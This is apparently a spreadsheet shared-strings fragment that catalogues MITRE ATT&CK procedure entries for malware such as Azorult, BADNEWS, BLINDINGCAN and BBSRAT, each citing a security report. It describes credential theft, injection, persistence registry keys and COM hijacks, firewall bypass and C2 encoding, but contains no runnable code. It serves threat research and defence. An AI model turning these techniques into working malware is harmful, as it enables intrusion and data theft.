    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) </t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials from the victim's browser.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) uses an XOR key to decrypt content and uses Base64 to decode the C2 address.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can delete files from victim machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can recursively search for files in folders and collects files from the desktop with certain extensions.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can download and execute additional files. [Azorult](https://attack.mitre.org/software/S0344) has also downloaded a ransomware payload called Hermes.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can check for installed software on the system under the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Uninstall&lt;/code&gt;.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can capture screenshots of the victim’s machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can encrypt C2 traffic using XOR.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect host IP information from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the username from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the time zone information from the system.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>The "ZR" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) will check to see if known host-based firewalls are installed on the infected systems. [BACKSPACE](https://attack.mitre.org/software/S0031) will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to upload files to the C2 Server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) allows adversaries to search for files.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>The "ZJ" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of deleting Registry keys, sub-keys, and values on a victim system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>Newer variants of [BACKSPACE](https://attack.mitre.org/software/S0031) will encode C2 communications with a custom system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) may collect information about running processes.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of enumerating and making modifications to an infected system's Registry.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>During its initial execution, [BACKSPACE](https://attack.mitre.org/software/S0031) extracts operating system information from the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to execute from the command line on infected hosts, or have [BACKSPACE](https://attack.mitre.org/software/S0031) create a reverse shell.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) disables the Windows firewall before binding to a port.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) modifies the firewall Registry key &lt;code&gt;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List&lt;/code&gt;.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) communicates on ports 443 and 8000 with a FakeTLS method.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) uses a FakeTLS method during C2.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) functions as a proxy server between the victim and C2 server.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) encrypts C2 traffic using an XOR/ADD cipher.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the computer name and host name on the compromised system.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the network adapter information.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) monitors USB devices and copies files with certain extensions to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) typically loads its DLL file into a legitimate signed Java or VMware executable.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>After encrypting C2 data, [BADNEWS](https://attack.mitre.org/software/S0128) converts it into a hexadecimal representation and then encodes it into base64.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies files with certain extensions from USB devices to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) collects C2 information via a dead drop resolver.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) identifies files with certain extensions from USB devices, then copies them to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of downloading additional files through C2 channels, including a new version of itself.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) spawns a new thread to log keystrokes.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies documents under 15MB found on the victim system to is the user's &lt;code&gt;%temp%\SMB\&lt;/code&gt; folder. It also copies files from USB devices to a predefined directory.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) attempts to hide its payloads using legitimate filenames.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and use process hollowing to inject it into a new process.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) installs a registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) creates a scheduled task to establish by executing a malicious payload every subsequent minute.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to take a screenshot and send it to the C2 server.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encodes C2 traffic with base64.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encrypts C2 data with a ROR by 3 and an XOR by 0x23.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of executing commands via cmd.exe.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use the &lt;code&gt;CreatePipe&lt;/code&gt; API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can compress data with ZLIB prior to sending it back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList &lt;code&gt;{42aedc87-2188-41fd-b9a3-0c966feabec1}&lt;/code&gt; or Microsoft WBEM New Event Subsystem &lt;code&gt;{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}&lt;/code&gt; depending on the system's CPU architecture.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>DLL side-loading has been used to execute [BBSRAT](https://attack.mitre.org/software/S0127) through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with [BBSRAT](https://attack.mitre.org/software/S0127) by the dropper.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses [Expand](https://attack.mitre.org/software/S0361) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can delete files and directories.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list file and directory information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list running processes.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen loaded into msiexec.exe through process hollowing to hide its execution.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can start, stop, or delete services.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses a custom encryption algorithm on data sent back to the C2 server over HTTP.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can query service configuration information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can modify service configurations.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) uses SSL for encrypting C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) malware contains a secondary fallback command and control server that is contacted after the primary command and control server.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to download a file from the C2 server.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) can capture keystrokes.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to enumerate running processes and identify their owners.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to periodically take screenshots of the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to gather the username from the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to launch a command shell on the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to launch a malicious process.(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload files from a compromised host.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files from SMB file servers.(Citation: Microsoft About BITS)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has also obfuscated its C2 traffic as normal traffic to sites such as Github.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to delete files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to discover processes.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to create a reverse shell.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been signed with code-signing certificates such as CodeRipper.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [BLINDINGCAN](https://attack.mitre.org/software/S0520) has uploaded files from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used AES and XOR to decrypt its DLLs.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has sent user and system information to a C2 server via HTTP POST requests.(Citation: NHS UK BLINDINGCAN Aug 2020)(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has deleted itself and associated artifacts from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) can search, read, write, move, and execute files.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has downloaded files to a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has lured victims into executing malicious macros embedded within Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has attempted to hide its payload by using legitimate file names such as "iconcache.db".(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has obfuscated code using Base64 encoding.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has loaded and executed DLLs in memory during runtime on a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been packed with the UPX packer.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been delivered by phishing emails containing malicious Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encoded its C2 traffic with Base64.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encrypted its C2 traffic with RC4.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected the victim machine's local IP address information and MAC address.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has modified file and directory timestamps.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has executed commands via cmd.exe.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can use DNS and TXT records within its DNS tunneling protocol for command and control.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses a DGA to communicate with command and control servers.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can download or upload files from its C2 server.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) persists using a scheduled task that executes every minute.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can read batch commands in a file sent from its C2 server and execute them with cmd.exe.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has been signed by a valid CA.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used a a 32-byte long multi-XOR key to decode data inside its payload.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used the DWriteCreateFactory() function to load additional modules.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) uses Base64 encoding for communication in the message body of an HTTP request.(Citation: Villeneuve et al 2014)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using SOCKS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) collects system information, including the operating system version and hostname.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using HTTP or HTTPS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has the ability to decode downloaded files prior to execution.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has cleaned up all files associated with the secondary payload execution.(Citation: Unit42 BabyShark Apr 2019)</t>
